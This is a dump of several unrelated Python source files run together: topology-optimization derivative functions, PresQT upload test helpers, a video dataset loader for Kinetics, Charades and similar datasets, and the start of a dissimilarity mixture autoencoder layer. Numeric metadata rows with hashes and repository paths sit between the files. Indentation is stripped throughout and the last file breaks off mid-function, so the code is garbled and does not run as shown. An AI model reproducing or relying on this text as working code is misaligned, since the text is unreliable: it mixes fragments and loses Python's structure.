def derivative_local_ki(coord, connect, E, v, rho, alpha, beta, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam, ind_dofs, passive_el):
""" Calculates the derivative of the local kinetic energy function.
Args:
coord (:obj:`numpy.array`): Coordinates of the element.
connect (:obj:`numpy.array`): Element connectivity.
E (:obj:`float`): Elastic modulus.
v (:obj:`float`): Poisson's ratio.
rho (:obj:`float`): Density.
alpha (:obj:`float`): Damping coefficient proportional to mass.
beta (:obj:`float`): Damping coefficient proportional to stiffness.
omega_par (:obj:`float`): 2 * pi * frequency.
p_par (:obj:`int`): Penalization power to stiffness.
q_par (:obj:`int`): Penalization power to mass.
x_min_m (:obj:`float`): Minimum relative densities to mass.
x_min_k (:obj:`float`): Minimum relative densities to stiffness.
xval (:obj:`numpy.array`): Indicates where there is mass.
disp_vector (:obj:`numpy.array`): Displacement vector.
lam (:obj:`float`): Lambda parameter.
ind_dofs (:obj:`numpy.array`, optional): TODO
passive_el (:obj:`numpy.array`): Passive element nodes.
Returns:
Derivative of the local input power energy function.
"""
deriv_ek = np.empty((len(connect), 1), dtype=complex)
for el in range(len(connect)):
Ke, Me = fc.matricesQ4(el, coord, connect, E, v, rho)
ind = ind_dofs[el, :]
dKe = p_par * (xval[el]**(p_par - 1))*(1-x_min_k) * Ke
dCe = alpha * Me + beta * dKe
if xval[el]>0.1:
dMe = q_par * (xval[el]**(q_par - 1))*(1-x_min_m) * Me
else:
dMe = ((9*3.512e7*xval[el]**8 - 10*2.081e8*xval[el]**9)*(1-x_min_m) ) * Me
dKed = dKe + omega_par * 1j * dCe - (omega_par**2) * dMe
if el in passive_el:
deriv_ek[el, 0] = ((omega_par**2)/4) * disp_vector[ind].conj().reshape(1, -1)@dMe@disp_vector[ind] + (lam[ind].T@dKed@disp_vector[ind]).real
else:
deriv_ek[el, 0] = (lam[ind]@dKed@disp_vector[ind]).real
return deriv_ek
def derivative_local_R(df_ep, df_ki, fvirg):
""" Calculates the derivative of the local strain-to-kinetic function.
Args:
df_ep (:obj:`numpy.array`): Elastic potential energy derivative.
df_ki (:obj:`numpy.array`): Kinetic energy derivative.
fvirg (:obj:`float`): Local strain-to-kinetic function.
Returns:
Derivative of the local strain-to-kinetic function function.
"""
#fvirg = (ep,ki)
return df_ep * (1/fvirg[1]) - (fvirg[0]/fvirg[1]**2)*df_ki
def derivatives_objective(func_name, fvirg, disp_vector, coord, connect, E, v, rho, alpha_par, beta_par, omega_par, p_par, q_par, x_min_m, x_min_k, xval, load_vector=None, mass_matrix=None, stif_matrix=None, dyna_stif=None, free_ind=None, ind_dofs=None, ngl=None, ind_passive=None, passive_el=None):
""" Calculates the derivative of the specified function.
Args:
func_name (:obj:`str`): Objective function used.
fvirg (:obj:`float`): Non-logarithm function value.
disp_vector (:obj:`numpy.array`): Displacement vector.
coord (:obj:`numpy.array`): Coordinates of the element.
connect (:obj:`numpy.array`): Element connectivity.
E (:obj:`float`): Elastic modulus.
v (:obj:`float`): Poisson's ratio.
rho (:obj:`float`): Density.
alpha_par (:obj:`float`): Damping coefficient proportional to mass.
beta_par (:obj:`float`): Damping coefficient proportional to stiffness.
omega_par (:obj:`float`): 2 * pi * frequency.
p_par (:obj:`int`): Penalization power to stiffness.
q_par (:obj:`int`): Penalization power to mass.
x_min_m (:obj:`float`): Minimum relative densities to mass.
x_min_k (:obj:`float`): Minimum relative densities to stiffness.
xval (:obj:`numpy.array`): Indicates where there is mass.
load_vector (:obj:`numpy.array`, optional): Force vector.
mass_matrix (:obj:`numpy.array`, optional): Mass matrix.
stif_matrix (:obj:`numpy.array`, optional): Stiffness matrix.
dyna_stif (:obj:`numpy.array`, optional): Dynamic stiffness matrix.
free_ind (:obj:`numpy.array`, optional): Free dofs.
ind_dofs (:obj:`numpy.array`, optional): Defaults to None.
ngl (:obj:`int`): Degrees of freedom.
ind_passive (:obj:`numpy.array`, optional): Index of passive elements.
passive_el (:obj:`numpy.array`, optional): Passive element nodes.
Returns:
Derivative of the specified function.
"""
if func_name == "compliance":
lam_par = lambda_compliance(disp_vector, load_vector, fvirg)
df0dx = derivative_compliance(coord, connect, E, v, rho, alpha_par, beta_par, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam_par)
elif func_name == "elastic_potential_energy":
lam_par = lambda_ep(disp_vector, stif_matrix, dyna_stif, free_ind)
df0dx = derivative_ep(coord, connect, E, v, rho, alpha_par, beta_par, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam_par)
#Log Scale
df0dx[:, 0] = 10.0*df0dx[:, 0]*np.log10(np.exp(1))/fvirg
elif func_name == "input_power":
df0dx = derivative_input_power(coord, connect, E, v, rho, alpha_par, beta_par, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector)
#Log Scale
df0dx[:, 0] = 10.0*df0dx[:, 0]*np.log10(np.exp(1))/fvirg
elif func_name == "kinetic_energy":
lam_par = lambda_ek(disp_vector, mass_matrix, dyna_stif, omega_par, free_ind)
df0dx = derivative_ek(coord, connect, E, v, rho, alpha_par, beta_par, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam_par)
#Log Scale
df0dx[:, 0] = 10.0*df0dx[:, 0]*np.log10(np.exp(1))/fvirg
elif func_name == "r_ratio":
if omega_par == 0:
omega_par = 1e-12
kinetic_e = ((1/4) * omega_par**2 * (disp_vector.conjugate()@mass_matrix@disp_vector)).real
lam_par = lambda_R(disp_vector, dyna_stif, stif_matrix, mass_matrix, omega_par, fvirg, kinetic_e, free_ind)
df0dx = derivative_R(coord, connect, E, v, rho, alpha_par, beta_par, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam_par, fvirg, kinetic_e)
#Log Scale
df0dx[:, 0] = 10.0*df0dx[:, 0]*np.log10(np.exp(1))/fvirg
elif func_name == "local_ep":
lam_par = lambda_local_ep(ngl, ind_passive, passive_el, disp_vector, dyna_stif, coord, connect, E, v, rho)
df0dx = derivative_local_ep(passive_el, lam_par, ind_dofs, xval, disp_vector, connect, coord, E, v, rho, x_min_k, x_min_m, omega_par, alpha_par, beta_par, p_par, q_par)
#Log Scale
df0dx[:, 0] = 10*df0dx[:, 0] * np.log10(np.exp(1))/fvirg
elif func_name == "local_ki":
lam_par = lambda_local_ki(ngl, ind_passive, passive_el, disp_vector, dyna_stif, omega_par, coord, connect, E, v, rho)
df0dx = derivative_local_ki(coord, connect, E, v, rho, alpha_par, beta_par, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam_par, ind_dofs, passive_el)
#Log Scale
df0dx[:, 0] = 10.0*df0dx[:, 0]*np.log10(np.exp(1))/fvirg
elif func_name == "local_r":
lam_par = lambda_local_ep(ngl, ind_passive, passive_el, disp_vector, dyna_stif, coord, connect, E, v, rho)
df_ep = derivative_local_ep(passive_el, lam_par, ind_dofs, xval, disp_vector, connect, coord, E, v, rho, x_min_k, x_min_m, omega_par, alpha_par, beta_par, p_par, q_par)
lam_par = lambda_local_ki(ngl, ind_passive, passive_el, disp_vector, dyna_stif, omega_par, coord, connect, E, v, rho)
df_ki = derivative_local_ki(coord, connect, E, v, rho, alpha_par, beta_par, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam_par, ind_dofs, passive_el)
df0dx = derivative_local_R(df_ep, df_ki, fvirg)
#Log Scale
df0dx[:, 0] = 10.0*df0dx[:, 0]*np.log10(np.exp(1))/(fvirg[0]/fvirg[1])
return df0dx.real | 49.712204 | 299 | 0.615345 | 3,946 | 27,292 | 4.08591 | 0.045616 | 0.048626 | 0.057247 | 0.025181 | 0.925944 | 0.892576 | 0.860448 | 0.826087 | 0.77132 | 0.752651 | 0 | 0.021117 | 0.233072 | 27,292 | 549 | 300 | 49.712204 | 0.749176 | 0.441155 | 0 | 0.628959 | 0 | 0 | 0.006288 | 0.001696 | 0 | 0 | 0 | 0.003643 | 0 | 1 | 0.067873 | false | 0.085973 | 0.0181 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
598d499f022400a40a8c10902f597b5b2975da35 | 6,498 | py | Python | presqt/targets/utilities/tests/shared_upload_test_functions.py | djordjetrajkovic/presqt | 8424b61b1c5b8d29de74c7a333889d9e9eb7aee8 | [
"Apache-2.0"
] | 3 | 2019-01-29T19:45:25.000Z | 2020-12-01T18:24:51.000Z | presqt/targets/utilities/tests/shared_upload_test_functions.py | djordjetrajkovic/presqt | 8424b61b1c5b8d29de74c7a333889d9e9eb7aee8 | [
"Apache-2.0"
] | 419 | 2018-09-13T23:11:15.000Z | 2021-09-22T17:49:00.000Z | presqt/targets/utilities/tests/shared_upload_test_functions.py | djordjetrajkovic/presqt | 8424b61b1c5b8d29de74c7a333889d9e9eb7aee8 | [
"Apache-2.0"
] | 2 | 2020-04-10T08:19:41.000Z | 2021-01-04T15:29:42.000Z | import json
from presqt.utilities import read_file
def process_wait(process_info, ticket_path):
# Wait until the spawned off process finishes in the background to do further validation
while process_info['resource_upload']['status'] == 'in_progress':
try:
process_info = read_file('{}/process_info.json'.format(ticket_path), True)
except json.decoder.JSONDecodeError:
# Pass while the process_info file is being written to
pass
def shared_upload_function_osf(test_case_instance):
test_case_instance.headers['HTTP_PRESQT_FILE_DUPLICATE_ACTION'] = test_case_instance.duplicate_action
# Verify the status code and content
response = test_case_instance.client.post(test_case_instance.url, {
'presqt-file': open(test_case_instance.file, 'rb')}, **test_case_instance.headers)
test_case_instance.ticket_path = 'mediafiles/jobs/{}'.format(test_case_instance.ticket_number)
# Verify status code and message
test_case_instance.assertEqual(response.status_code, 202)
test_case_instance.assertEqual(
response.data['message'], 'The server is processing the request.')
# Verify process_info file status is 'in_progress' initially
process_info = read_file('{}/process_info.json'.format(test_case_instance.ticket_path), True)
test_case_instance.assertEqual(process_info['resource_upload']['status'], 'in_progress')
# Wait until the spawned off process finishes in the background to do further validation
process_wait(process_info, test_case_instance.ticket_path)
# Verify process_info.json file data
process_info = read_file('{}/process_info.json'.format(test_case_instance.ticket_path), True)
test_case_instance.assertEqual(process_info['resource_upload']['status'], 'finished')
test_case_instance.assertEqual(process_info['resource_upload']['message'], 'Upload successful.')
test_case_instance.assertEqual(process_info['resource_upload']['status_code'], '200')
test_case_instance.assertEqual(process_info['resource_upload']['failed_fixity'], [])
test_case_instance.assertEqual(
process_info['resource_upload']['resources_ignored'], test_case_instance.resources_ignored)
test_case_instance.assertEqual(
process_info['resource_upload']['resources_updated'], test_case_instance.resources_updated)
test_case_instance.assertEqual(
process_info['resource_upload']['hash_algorithm'], test_case_instance.hash_algorithm)
def shared_upload_function_github(test_case_instance):
test_case_instance.headers['HTTP_PRESQT_FILE_DUPLICATE_ACTION'] = test_case_instance.duplicate_action
response = test_case_instance.client.post(test_case_instance.url, {'presqt-file': open(
test_case_instance.file, 'rb')}, **test_case_instance.headers)
test_case_instance.ticket_path = 'mediafiles/jobs/{}'.format(test_case_instance.ticket_number)
# Verify status code and message
test_case_instance.assertEqual(response.status_code, 202)
test_case_instance.assertEqual(
response.data['message'], 'The server is processing the request.')
# Verify process_info file status is 'in_progress' initially
process_info = read_file('{}/process_info.json'.format(test_case_instance.ticket_path), True)
test_case_instance.assertEqual(process_info['resource_upload']['status'], 'in_progress')
# Wait until the spawned off process finishes in the background to do further validation
process_wait(process_info, test_case_instance.ticket_path)
# Verify process_info.json file data
process_info = read_file('{}/process_info.json'.format(test_case_instance.ticket_path), True)
test_case_instance.assertEqual(process_info['resource_upload']['status'], 'finished')
test_case_instance.assertEqual(
process_info['resource_upload']['message'], test_case_instance.process_message)
test_case_instance.assertEqual(process_info['resource_upload']['status_code'], '200')
test_case_instance.assertEqual(
process_info['resource_upload']['failed_fixity'], test_case_instance.failed_fixity)
test_case_instance.assertEqual(
process_info['resource_upload']['resources_ignored'], test_case_instance.resources_ignored)
test_case_instance.assertEqual(
process_info['resource_upload']['resources_updated'], test_case_instance.resources_updated)
test_case_instance.assertEqual(
process_info['resource_upload']['hash_algorithm'], test_case_instance.hash_algorithm)
def shared_upload_function_gitlab(test_case_instance):
test_case_instance.headers['HTTP_PRESQT_FILE_DUPLICATE_ACTION'] = test_case_instance.duplicate_action
response = test_case_instance.client.post(test_case_instance.url, {'presqt-file': open(
test_case_instance.file, 'rb')}, **test_case_instance.headers)
test_case_instance.ticket_path = 'mediafiles/jobs/{}'.format(test_case_instance.ticket_number)
# Verify status code and message
test_case_instance.assertEqual(response.status_code, 202)
test_case_instance.assertEqual(
response.data['message'], 'The server is processing the request.')
# Verify process_info file status is 'in_progress' initially
process_info = read_file('{}/process_info.json'.format(test_case_instance.ticket_path), True)
test_case_instance.assertEqual(process_info['resource_upload']['status'], 'in_progress')
# Wait until the spawned off process finishes in the background to do further validation
process_wait(process_info, test_case_instance.ticket_path)
# Verify process_info.json file data
process_info = read_file('{}/process_info.json'.format(test_case_instance.ticket_path), True)
test_case_instance.assertEqual(process_info['resource_upload']['status'], 'finished')
test_case_instance.assertEqual(process_info['resource_upload']['message'], test_case_instance.success_message)
test_case_instance.assertEqual(process_info['resource_upload']['status_code'], '200')
test_case_instance.assertEqual(process_info['resource_upload']['failed_fixity'], [])
test_case_instance.assertEqual(
process_info['resource_upload']['resources_ignored'], test_case_instance.resources_ignored)
test_case_instance.assertEqual(
process_info['resource_upload']['resources_updated'], test_case_instance.resources_updated)
test_case_instance.assertEqual(
process_info['resource_upload']['hash_algorithm'], test_case_instance.hash_algorithm)
| 54.15 | 114 | 0.775777 | 822 | 6,498 | 5.742092 | 0.100973 | 0.132203 | 0.264407 | 0.17161 | 0.941525 | 0.941525 | 0.941525 | 0.932839 | 0.924364 | 0.924364 | 0 | 0.003154 | 0.12173 | 6,498 | 119 | 115 | 54.605042 | 0.8239 | 0.124654 | 0 | 0.776316 | 0 | 0 | 0.213858 | 0.017454 | 0 | 0 | 0 | 0 | 0.394737 | 1 | 0.052632 | false | 0.013158 | 0.026316 | 0 | 0.078947 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
abd2ed72765e1006958ff1f6e30ccf0df6819a16 | 19,351 | py | Python | dataset.py | sghong977/BTSNet | a341a14ee31b193428f8087c64dba66dd9935b58 | [
"MIT"
] | null | null | null | dataset.py | sghong977/BTSNet | a341a14ee31b193428f8087c64dba66dd9935b58 | [
"MIT"
] | null | null | null | dataset.py | sghong977/BTSNet | a341a14ee31b193428f8087c64dba66dd9935b58 | [
"MIT"
] | null | null | null | from torchvision import get_image_backend
import torchvision
from datasets.videodataset import VideoDataset
from datasets.videodataset_multiclips import (VideoDatasetMultiClips,
collate_fn)
from datasets.activitynet import ActivityNet
from datasets.hollywood2 import Hollywood2, Hollywood2MultiClips
from datasets.charades import Charades, CharadesMultiClips
from datasets.epic_kitchen import EpicKitchen, EpicKitchenMultiClips
from datasets.loader import VideoLoader, VideoLoaderHDF5, VideoLoaderFlowHDF5
from datasets.kinetics import Kinetics700, Kinetics700MultiClips
import torch
# --- class for concat multiple datasets ---------------
class ConcatDataset(torch.utils.data.Dataset):
def __init__(self, *datasets):
self.datasets = datasets
def __getitem__(self, i):
return tuple(d[i] for d in self.datasets)
def __len__(self):
return min(len(d) for d in self.datasets)
#--------------------------------------------------------
def image_name_formatter(x):
return f'image_{x:05d}.jpg'
def jester_img_name_formatter(x):
return f'{x:05d}.jpg'
# epic
def epic_image_name_formatter(x):
return f'frame{x:010d}.jpg'
def epic_flow_name_formatter(flow, x):
return flow + f'_{x:010d}.jpg'
def get_training_data(video_path,
annotation_path,
dataset_name,
input_type,
file_type,
spatial_transform=None,
temporal_transform=None,
target_transform=None,
):
assert dataset_name in [
'kinetics', 'activitynet', 'ucf101', 'hmdb51', 'mit', 'jester', 'charades', 'SVW', 'hollywood2', 'epic'
]
assert input_type in ['rgb', 'flow']
assert file_type in ['jpg', 'hdf5']
if file_type == 'jpg':
assert input_type == 'rgb', 'flow input is supported only when input type is hdf5.'
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(image_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(image_name_formatter)
video_path_formatter = (
lambda root_path, label, video_id: root_path / label / video_id)
else:
if input_type == 'rgb':
loader = VideoLoaderHDF5()
else:
loader = VideoLoaderFlowHDF5()
video_path_formatter = (lambda root_path, label, video_id: root_path /
label / f'{video_id}.hdf5')
if dataset_name == 'activitynet':
training_data = ActivityNet(video_path,
annotation_path,
'training',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'jester':
# different loader
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(jester_img_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(jester_img_name_formatter)
video_path_formatter = (
lambda root_path, label, video_id: root_path / video_id) #
training_data = VideoDataset(video_path,
annotation_path,
'training',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
# different path (w/o label folder)
elif dataset_name == 'hollywood2':
video_path_formatter = (
lambda root_path, label, video_id: root_path / video_id) #
training_data = Hollywood2(video_path,
annotation_path,
'training',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'charades':
video_path_formatter = (
lambda root_path, label, video_id: root_path / video_id) #
training_data = Charades(video_path,
annotation_path,
'training',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'epic':
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(epic_image_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(epic_image_name_formatter)
training_data = EpicKitchen(video_path,
annotation_path,
'training',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'kinetics':
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(epic_image_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(epic_image_name_formatter)
training_data = Kinetics700(video_path,
annotation_path,
'train',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
else:
training_data = VideoDataset(video_path,
annotation_path,
'training',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
return training_data
def get_validation_data(video_path,
annotation_path,
dataset_name,
input_type,
file_type,
spatial_transform=None,
temporal_transform=None,
target_transform=None):
assert dataset_name in [
'kinetics', 'activitynet', 'ucf101', 'hmdb51', 'mit', 'jester', 'charades', 'SVW', 'hollywood2', 'epic'
]
assert input_type in ['rgb', 'flow']
assert file_type in ['jpg', 'hdf5']
from datasets.videodataset_multiclips import collate_fn
collate_fn = collate_fn
if file_type == 'jpg':
assert input_type == 'rgb', 'flow input is supported only when input type is hdf5.'
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(image_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(image_name_formatter)
video_path_formatter = (
lambda root_path, label, video_id: root_path / label / video_id)
else:
if input_type == 'rgb':
loader = VideoLoaderHDF5()
else:
loader = VideoLoaderFlowHDF5()
video_path_formatter = (lambda root_path, label, video_id: root_path /
label / f'{video_id}.hdf5')
if dataset_name == 'activitynet':
validation_data = ActivityNet(video_path,
annotation_path,
'validation',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'jester':
# different loader
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(jester_img_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(jester_img_name_formatter)
video_path_formatter = (
lambda root_path, label, video_id: root_path / video_id) #
validation_data = VideoDatasetMultiClips(
video_path,
annotation_path,
'validation',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
# different path : w/o label
elif dataset_name == 'hollywood2':
from datasets.hollywood2 import collate_fn_val
collate_fn = collate_fn_val
video_path_formatter = (
lambda root_path, label, video_id: root_path / video_id) #
validation_data = Hollywood2MultiClips(
video_path,
annotation_path,
'validation',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'charades':
from datasets.charades import collate_fn_val
collate_fn = collate_fn_val
video_path_formatter = (
lambda root_path, label, video_id: root_path / video_id) #
validation_data = CharadesMultiClips(
video_path,
annotation_path,
'validation',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'epic':
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(epic_image_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(epic_image_name_formatter)
validation_data = EpicKitchenMultiClips(
video_path,
annotation_path,
'validation',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'kinetics':
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(epic_image_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(epic_image_name_formatter)
validation_data = Kinetics700(
video_path,
annotation_path,
'validation',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
else:
validation_data = VideoDatasetMultiClips(
video_path,
annotation_path,
'validation',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
return validation_data, collate_fn
# different scenario when charades or hollywood2
def get_inference_data(video_path,
annotation_path,
dataset_name,
input_type,
file_type,
inference_subset,
spatial_transform=None,
temporal_transform=None,
target_transform=None):
assert dataset_name in [
'kinetics', 'activitynet', 'ucf101', 'hmdb51', 'mit', 'charades', 'SVW', 'hollywood2', 'epic'
]
assert input_type in ['rgb', 'flow']
assert file_type in ['jpg', 'hdf5']
assert inference_subset in ['train', 'val', 'test']
if file_type == 'jpg':
assert input_type == 'rgb', 'flow input is supported only when input type is hdf5.'
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(image_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(image_name_formatter)
video_path_formatter = (
lambda root_path, label, video_id: root_path / label / video_id)
else:
if input_type == 'rgb':
loader = VideoLoaderHDF5()
else:
loader = VideoLoaderFlowHDF5()
video_path_formatter = (lambda root_path, label, video_id: root_path /
label / f'{video_id}.hdf5')
if inference_subset == 'train':
subset = 'training'
elif inference_subset == 'val':
subset = 'validation'
elif inference_subset == 'test':
subset = 'inference'
if dataset_name == 'activitynet':
inference_data = ActivityNet(video_path,
annotation_path,
subset,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter,
is_untrimmed_setting=True)
elif dataset_name == 'hollywood2':
from datasets.hollywood2 import collate_fn
video_path_formatter = (
lambda root_path, video_id: root_path / video_id) #
inference_data = Hollywood2MultiClips( #MultiClips
video_path,
annotation_path,
subset,
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'charades':
from datasets.charades import collate_fn
loader = VideoLoader(image_name_formatter)
video_path_formatter = (
lambda root_path, video_id: root_path / video_id) #
inference_data = CharadesMultiClips( #MultiClips
video_path,
annotation_path,
subset,
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'epic':
from datasets.epic_kitchen import collate_fn
# loader = VideoLoader(image_name_formatter)
# video_path_formatter = (
# lambda root_path, video_id: root_path / video_id) #
inference_data = CharadesMultiClips( #MultiClips
video_path,
annotation_path,
subset,
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'kinetics':
from datasets.epic_kitchen import collate_fn
# loader = VideoLoader(image_name_formatter)
# video_path_formatter = (
# lambda root_path, video_id: root_path / video_id) #
inference_data = CharadesMultiClips( #MultiClips
video_path,
annotation_path,
subset,
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
else:
inference_data = VideoDataset( #MultiClips
video_path,
annotation_path,
subset,
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter,
target_type=['label'])
return inference_data, collate_fn | 43.097996 | 111 | 0.566689 | 1,683 | 19,351 | 6.150921 | 0.062983 | 0.068682 | 0.097372 | 0.073029 | 0.874614 | 0.861476 | 0.84148 | 0.84148 | 0.84148 | 0.84148 | 0 | 0.005647 | 0.368611 | 19,351 | 449 | 112 | 43.097996 | 0.841627 | 0.030851 | 0 | 0.825316 | 0 | 0 | 0.048385 | 0 | 0 | 0 | 0 | 0 | 0.032911 | 1 | 0.025316 | false | 0 | 0.068354 | 0.01519 | 0.118987 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
abf69ae308b0b4a8ddbeb8bd0737ab3d1b1a40eb | 15,724 | py | Python | dmae/layers.py | larajuse/DMAE | 48fafdd257a8e172c66a67d2311120c481488513 | [
"MIT"
] | 8 | 2020-06-17T20:03:18.000Z | 2021-01-09T01:43:55.000Z | dmae/layers.py | juselara1/dmae | 48fafdd257a8e172c66a67d2311120c481488513 | [
"MIT"
] | 12 | 2021-01-28T06:35:25.000Z | 2022-03-12T00:54:32.000Z | dmae/layers.py | juselara1/dmae | 48fafdd257a8e172c66a67d2311120c481488513 | [
"MIT"
] | 3 | 2021-01-25T21:29:11.000Z | 2021-11-28T20:49:14.000Z | # -*- coding: utf-8 -*-
"""
The :mod:`dmae.layers` module implements the dissimilarity mixture autoencoder (DMAE) layers as
tensorflow keras layers.
"""
# Author: Juan S. Lara <julara@unal.edu.co>
# License: MIT
import tensorflow as _tf
from tensorflow.keras.layers import Layer as _Layer
from tensorflow.keras.initializers import RandomUniform as _RandomUniform, Constant as _Constant
from dmae import dissimilarities as _dissimilarities
class DissimilarityMixtureAutoencoder(_Layer):
"""
A :mod:`tf.keras` layer with the Dissimilarity Mixture Autoencoder (DMAE).
Parameters
----------
alpha : float
Softmax inverse temperature.
n_clusters : int
Number of clusters.
dissimilarity : function, default = :mod:`dmae.dissimilarities.euclidean`
A tensorflow function that computes a pairwise dissimilarity function
between a batch of points and the cluster's parameters.
trainable : dict, default = {"centers": True, "mixers": True}
Specifies which parameters are trainable.
initializers : dict, default = {"centers": :mod:`RandomUniform(-1, 1)`, "mixers": :mod:`Constant(1.0)`}
Specifies a keras initializer (:mod:`tf.keras.initializers`) for each parameter.
regularizers : dict, default = {"centers": None, "mixers": None}
Specifies a keras regularizer (:mod:`tf.keras.regularizers`) for each parameter.
"""
def __init__(
self, alpha, n_clusters,
dissimilarity=_dissimilarities.euclidean,
trainable={"centers": True, "mixers": False},
initializers={
"centers": _RandomUniform(-1, 1),
"mixers": _Constant(1.0)
},
regularizers={"centers": None, "mixers": None},
**kwargs
):
self.__alpha = _tf.constant(alpha, dtype=_tf.float32)
self.__n_clusters = n_clusters
self.__dissimilarity = dissimilarity
self.__trainable = trainable
self.__initializers = initializers
self.__regularizers = regularizers
super(DissimilarityMixtureAutoencoder, self).__init__(**kwargs)
def call(self, x):
"""
Forward pass in DMAE.
Parameters
----------
x : array_like
Input tensor.
Returns
-------
mu_tilde : array_like
Soft-assigned centroids.
pi_tilde : array_like
Soft-assigned mixing coefficients.
"""
# computes pairwise dissimilarities
D = self.__dissimilarity(x, self.centers)
# computes the soft-assignements
assigns = _tf.nn.softmax(
-self.__alpha * D +\
_tf.math.log(_tf.math.abs(self.mixers))
)
# soft-assigned centroids
mu_tilde = _tf.matmul(assigns, self.centers)
# soft-assigned mixing coefficients
